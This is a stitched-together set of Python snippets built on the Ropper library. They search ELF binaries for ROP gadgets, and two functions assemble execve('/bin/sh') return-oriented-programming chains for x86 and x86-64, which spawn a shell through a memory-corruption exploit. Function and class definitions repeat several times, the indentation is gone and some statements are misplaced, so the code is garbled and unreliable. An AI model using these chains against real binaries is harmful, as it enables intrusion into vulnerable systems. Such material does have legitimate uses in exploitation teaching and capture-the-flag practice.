def get_gadgets():
options = {
'color':
False, # if gadgets are printed, use colored output: default: False
'badbytes':
'00', # bad bytes which should not be in addresses or ropchains; default: ''
'all':
False, # Show all gadgets, this means to not remove double gadgets; default: False
'inst_count': 6, # Number of instructions in a gadget; default: 6
'type': 'all', # rop, jop, sys, all; default: all
'detailed': False
} # if gadgets are printed, use detailed output; default: False
rs = RopperService(options)
arch = 'x86_64'
bin_name = 'bin'
rs.addFile(bin_name, bytes=open('bin_4', 'rb').read(), raw=True, arch=arch)
rs.options.badbytes = ''
rs.options.all = True
rs.loadGadgetsFor()
rs.options.type = 'rop'
rs.loadGadgetsFor()
gags = []
for i in rs.search(search='pop rsi', name=bin_name):
gags.append(i)
for i in rs.search(search='leave', name=bin_name):
gags.append(i)
for i in rs.search(search='pop rdi', name=bin_name):
gags.append(i)
return gags
def get_gadgets(executable_name):
global binary_arch
arch = ''
if binary_arch == 'amd64':
arch = 'x86_64'
elif binary_arch == 'i386':
arch = 'x86'
else:
log.failure('Unknown arch')
exit()
options = {
'color': False,
'badbytes': '00',
'all': False,
'inst_count': 6,
'type': 'all',
'detailed': False
}
rs = RopperService(options)
rs.addFile(executable_name,
bytes=open(executable_name, 'rb').read(),
raw=True,
arch=arch)
rs.options.badbytes = ''
rs.options.all = True
rs.loadGadgetsFor()
rs.options.type = 'rop'
rs.loadGadgetsFor()
gags = []
if binary_arch == 'amd64':
for i in rs.search(search='pop r?i', name=executable_name):
gags.append(str(i[1]))
for i in rs.search(search='pop r?x', name=executable_name):
gags.append(str(i[1]))
for i in rs.search(search='pop r?p', name=executable_name):
gags.append(str(i[1]))
for i in rs.search(search='syscall', name=executable_name):
gags.append(str(i[1]))
break
for i in rs.search(search='leave', name=executable_name):
gags.append(str(i[1]))
break
else:
for i in rs.search(search='pop e?x', name=executable_name):
gags.append(str(i[1]))
for i in rs.search(search='pop e?p', name=executable_name):
gags.append(str(i[1]))
for i in rs.search(search='int 0x80', name=executable_name):
gags.append(str(i[1]))
break
for i in rs.search(search='leave', name=executable_name):
gags.append(str(i[1]))
break
return gags
def load_elfx86(elf):
rs = RopperService()
rs.addFile(elf)
rs.loadGadgetsFor()
for file, gadget in rs.search(search="pop ecx; pop ebx; ret", name=elf):
pop_ecx_ebx = ffropper(gadget)
print("[+] pop ecx; ebx; ret; : " + pop_ecx_ebx)
for file, gadget in rs.search(search="pop eax; ret;", name=elf):
pop_eax = ffropper(gadget)
print("[+] pop eax; ret; : " + pop_eax)
for file, gadget in rs.search(search="pop edx; ret;", name=elf):
pop_edx = ffropper(gadget)
print("[+] pop edx; ret; : " + pop_edx)
for file, gadget in rs.search(search="mov [edx], eax; ret", name=elf):
mov_edx_eax = ffropper(gadget)
print("[+] mov dword ptr [edx], eax; ret; : " + mov_edx_eax)
for file, gadget in rs.search(search="int 0x80; ret;", name=elf):
int0x80 = ffropper(gadget)
print("[+] int 0x80; ret; : " + int0x80)
with open(elf, 'rb') as f:
e = ELFFile(f)
for section in e.iter_sections():
if section.name == ".bss":
bss = section["sh_addr"]
print("[+] bss segment : " + hex(bss))
payload = craft_payloadx86(pop_eax, "pop eax; ret")
payload += craft_payloadx86("'/bin'", "/bin/sh string", string=1)
payload += craft_payloadx86(pop_edx, "pop edx; ret")
payload += craft_payloadx86(hex(bss), "bss+0")
payload += craft_payloadx86(mov_edx_eax, "mov dword ptr [edx], eax; ret; ")
payload += craft_payloadx86(pop_eax, "pop eax; ret")
payload += craft_payloadx86("'/sh\\x00'", "/bin/sh string", string=1)
payload += craft_payloadx86(pop_edx, "pop edx; ret")
payload += craft_payloadx86(hex(bss + 4), "bss+4")
payload += craft_payloadx86(mov_edx_eax, "mov dword ptr [edx], eax; ret; ")
payload += craft_payloadx86(pop_eax, "pop eax; ret")
payload += craft_payloadx86(str(11), "execve()")
payload += craft_payloadx86(pop_edx, "pop edx; ret")
payload += craft_payloadx86(0, "0")
payload += craft_payloadx86(pop_ecx_ebx, "pop ecx; ebx; ret")
payload += craft_payloadx86("0", "0")
payload += craft_payloadx86(hex(bss), "bss")
payload += craft_payloadx86(int0x80, "int 0x80; ret;")
return payload
def doSyscall(self, id):
flag = 0;
s,p = self.set_reg(rax=1,data=int(id,16),mode=2)
for g in self.gadgets:
if "syscall ; ret \n" == self.gadgets[g]:
self.code.append("chain += p64(" + g + ")")
self.payload += p64(int(g,16))
self.gadget_used.append(self.gadgets[g])
flag =1
break;
if flag!=1:
rs = RopperService()
rs.addFile(self.binary)
rs.loadGadgetsFor()
for f, g in rs.search('syscall; ret'):
line = str(g)
address = '0x' + line.split(": ")[0][12:]
self.gadgets[address] = line.split(": ")[1]
self.code.append("chain += p64(" + address + ")")
self.payload += p64(int(address,16))
self.gadget_used.append(self.gadgets[address])
flag = 1
break
if flag!=1:
raise Exception('No syscall gadgets found!')
return self.code, self.payload
def load_elfx64(elf):
rs = RopperService()
rs.addFile(elf)
rs.loadGadgetsFor()
for file, gadget in rs.search(search="pop rdx; ret;", name=elf):
pop_rdx = ffropper(gadget)
print("[+] pop rdx; ret; : " + pop_rdx)
for file, gadget in rs.search(search="pop rax; ret;", name=elf):
pop_rax = ffropper(gadget)
print("[+] pop rax; ret; : " + pop_rax)
for file, gadget in rs.search(search="pop rsi; ret;", name=elf):
pop_rsi = ffropper(gadget)
print("[+] pop rsi; ret; : " + pop_rsi)
for file, gadget in rs.search(search="pop rdi; ret;", name=elf):
pop_rdi = ffropper(gadget)
print("[+] pop rdi; ret; : " + pop_rdi)
for file, gadget in rs.search(search="mov [rdx], rax; ret; ", name=elf):
mov_rdx_rax = ffropper(gadget)
# print(gadget)
print("[+] mov qword ptr [rdx], rax; ret; : " + mov_rdx_rax)
for file, gadget in rs.search(search="syscall; ret;", name=elf):
syscall = ffropper(gadget)
print("[+] syscall; ret; : " + syscall)
with open(elf, 'rb') as f:
e = ELFFile(f)
for section in e.iter_sections():
if section.name == ".bss":
bss = section["sh_addr"]
print("[+] bss segment : " + hex(bss))
payload = craft_payloadx64(pop_rax, "pop rax; ret;")
payload += craft_payloadx64("'/bin/sh\\x00'", "/bin/sh string", string=1)
payload += craft_payloadx64(pop_rdx, "pop rdx; ret;")
payload += craft_payloadx64(bss, "bss")
payload += craft_payloadx64(mov_rdx_rax, "mov [rdx], rax; ret")
payload += craft_payloadx64(pop_rax, "pop rax; ret")
payload += craft_payloadx64(59, "execve()")
payload += craft_payloadx64(pop_rdi, "pop rdi; ret")
payload += craft_payloadx64(bss, "bss")
payload += craft_payloadx64(pop_rsi, "pop rsi; ret")
payload += craft_payloadx64(0, "NULL")
payload += craft_payloadx64(pop_rdx, "pop rdx; ret")
payload += craft_payloadx64(0, "NULL")
payload += craft_payloadx64(syscall, "syscall")
return payload
class MyRopper():
def __init__(self, filename):
self.rs = RopperService()
self.rs.clearCache()
self.rs.addFile(filename)
self.rs.loadGadgetsFor()
self.rs.options.inst_count = 10
self.rs.loadGadgetsFor()
self.rs.loadGadgetsFor() # sometimes Ropper doesn't update new gadgets
def get_gadgets(self, regex):
gadgets = []
for _, g in self.rs.search(search=regex):
gadgets.append(g)
if len(gadgets) > 0:
return gadgets
else:
raise Exception("Cannot find gadgets!")
def contains_string(self, string):
s = self.rs.searchString(string)
t = [a for a in s.values()][0]
return len(t) > 0
def get_arch(self):
return self.rs.files[0].arch._name
@staticmethod
def get_ra_offset(gadget):
"""
Return the offset of next Retun Address on the stack
So you know how many bytes to put before next gadget address
Eg:
lw $ra, 0xAB ($sp) --> return: 0xAB
"""
for line in gadget.lines:
offset_len = re.findall("lw \$ra, (0x[0-9a-f]+)\(\$sp\)", line[1])
if offset_len:
return int(offset_len[0], 16)
raise Exception("Cannot find $ra offset in this gadget!")
class MyRopper():
def __init__(self, filename):
self.rs = RopperService()
self.rs.clearCache()
self.rs.addFile(filename)
self.rs.loadGadgetsFor()
self.rs.options.inst_count = 10
self.rs.loadGadgetsFor()
self.rs.loadGadgetsFor() # sometimes Ropper doesn't update new gadgets
def get_gadgets(self, regex):
gadgets = []
for _, g in self.rs.search(search=regex):
gadgets.append(g)
if len(gadgets) > 0:
return gadgets
else:
raise Exception("Cannot find gadgets!")
def contains_string(self, string):
s = self.rs.searchString(string)
t = [a for a in s.values()][0]
return len(t) > 0
def get_arch(self):
return self.rs.files[0].arch._name
@staticmethod
def get_ra_offset(gadget):
"""
Return the offset of next Retun Address on the stack
So you know how many bytes to put before next gadget address
Eg:
lw $ra, 0xAB ($sp) --> return: 0xAB
"""
for line in gadget.lines:
offset_len = re.findall("lw \$ra, (0x[0-9a-f]+)\(\$sp\)", line[1])
if offset_len:
return int(offset_len[0], 16)
raise Exception("Cannot find $ra offset in this gadget!")
class MyRopper():
def __init__(self, filename):
self.rs = RopperService()
self.rs.clearCache()
self.rs.addFile(filename)
self.rs.loadGadgetsFor()
self.rs.options.inst_count = 10
self.rs.loadGadgetsFor()
self.rs.loadGadgetsFor()
def get_gadgets(self, regex):
gadgets = []
for _, g in self.rs.search(search=regex):
gadgets.append(g)
if len(gadgets) > 0:
return gadgets
else:
raise Exception("[-] Cannot find gadgets!")
def contains_string(self, string):
s = self.rs.searchString(string)
t = [a for a in s.values()][0]
return len(t) > 0
def get_arch(self):
return self.rs.files[0].arch._name
@staticmethod
def get_ra_offset(gadget):
for line in gadget.lines:
offset_len = re.findall("lw \$ra, (0x[0-9a-f]+)\(\$sp\)", line[1])
if offset_len:
return int(offset_len[0], 16)
raise Exception("[-] Cannot find $ra offset in this gadget!")
print j
##### search opcode ######
ls = 'test-binaries/ls-x86'
gadgets_dict = rs.searchOpcode(opcode='ffe4', name=ls)
gadgets_dict = rs.searchOpcode(opcode='ffe?')
gadgets_dict = rs.searchOpcode(opcode='??e4')
for file, gadgets in gadgets_dict.items():
for g in gadgets:
print g
##### search instructions ######
ls = 'test-binaries/ls-x86'
for file, gadget in rs.search(search='mov e?x', name=ls):
print file, gadget
for file, gadget in rs.search(search='mov [e?x%]'):
print file, gadget
result_dict = rs.searchdict(search='mov eax')
for file, gadgets in result_dict.items():
print file
for gadget in gadgets:
print gadget
##### assemble instructions ######
hex_string = rs.asm('jmp esp')
print '"jmp esp" assembled to hex string =', hex_string
raw_bytes = rs.asm('jmp esp', format='raw')
for j in jmp_reg:
print j
##### search opcode ######
ls = 'test-binaries/ls-x86'
gadgets_dict = rs.searchOpcode(opcode='ffe4', name=ls)
gadgets_dict = rs.searchOpcode(opcode='ffe?')
gadgets_dict = rs.searchOpcode(opcode='??e4')
for file, gadgets in gadgets_dict.items():
for g in gadgets:
print g
##### search instructions ######
ls = 'test-binaries/ls-x86'
for file, gadget in rs.search(search='mov e?x', name=ls):
print file, gadget
for file, gadget in rs.search(search='mov [e?x%]'):
print file, gadget
result_dict = rs.searchdict(search='mov eax')
for file, gadgets in result_dict.items():
print file
for gadget in gadgets:
print gadget
##### assemble instructions ######
hex_string = rs.asm('jmp esp')
print '"jmp esp" assembled to hex string =', hex_string
raw_bytes = rs.asm('jmp esp', format='raw')